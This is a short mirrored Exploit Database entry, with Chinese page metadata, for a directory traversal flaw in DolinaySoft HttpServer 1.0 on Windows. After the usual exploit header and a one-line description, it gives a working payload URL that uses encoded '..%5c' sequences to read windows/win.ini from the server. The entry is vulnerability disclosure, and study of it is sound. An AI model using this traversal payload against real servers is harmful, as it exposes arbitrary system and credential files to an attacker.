HttpServer 1.0 – Directory Traversal

• Exploit Database
• 18 阅读

• 作者： malwrforensics
  日期： 2017-03-19
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/41638/

• # Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal
  # Date: 2017-03-19
  # Exploit Author: malwrforensics
  # Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download
  # Version: 1.0
  # Tested on: Windows
  
  Exploiting this issue will allow an attacker to view arbitrary files
  within the context of the web server.
  
  Example:
  Assuming the root folder is c:\<app_folder>\<html_folder>
  
  http://<server>/..%5c..%5c/windows/win.ini